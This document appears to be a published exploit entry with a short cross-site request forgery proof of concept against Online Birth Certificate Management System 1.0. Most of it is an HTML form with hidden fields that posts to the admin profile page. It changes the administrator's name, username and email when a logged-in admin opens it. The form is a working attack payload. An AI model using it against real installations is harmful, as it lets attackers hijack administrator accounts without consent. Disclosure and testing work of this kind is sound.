Online Birth Certificate Management System 1.0 Cross Site Request Forgery

Posted Sep 27, 2022
Authored by Yousef Alraddadi
Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability.
tags | exploit, csrf
SHA-256 | f90076f01c3d533b4fccbc2387bf165114d9246cfe28d87c6be0ae171a022afe
# Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

# No anti-CSRF token in the admin profile update form

<html>
<head>
<title> CSRF update Profile </title>
</head>
<body>
<form action="http://localhost/OBCMS/admin/profile.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="adminname" value="csrf111">
<input type="hidden" name="username" value="csrf">
<input type="hidden" name="email" value="csrf">
<input type="hidden" name="mobilenumber" value="0">
<button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="submit">Save Change</button>
</form>
</body>
</html>
